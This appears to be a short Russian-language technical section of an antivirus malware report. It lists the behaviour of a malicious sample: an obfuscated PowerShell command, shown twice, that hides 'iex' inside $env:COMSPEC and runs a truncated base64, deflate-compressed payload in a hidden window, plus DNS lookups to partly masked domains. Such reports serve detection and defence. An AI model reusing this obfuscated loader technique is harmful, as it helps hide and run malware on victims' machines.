Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $eNv:COMspec[4,26,25]-jOin'')( new-obJEcT syStEM.io.cOmPrEsSiOn.DEfLATESTrEAm([iO.mEMOrYStREAM][ConverT]::FROMBAsE64STRinG('VZDLbsIwFER/JYtIBlHsorKgRJHog1bd9IX6oOrGcS7kEscOzqUujfj3JlmgdjtzdK...
- DNS ASK hz##djd.com
- DNS ASK em###arton.com
- DNS ASK li####na.barcelona
- DNS ASK me######geriatrica.com.br
- DNS ASK ri#####amindonesia.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $eNv:COMspec[4,26,25]-jOin'')( new-obJEcT syStEM.io.cOmPrEsSiOn.DEfLATESTrEAm([iO.mEMOrYStREAM][ConverT]::FROMBAsE64STRinG('VZDLbsIwFER/JYtIBlHsorKgRJHog1bd9IX6oOrGcS7kEscOzqUujfj3JlmgdjtzdK...' (со скрытым окном)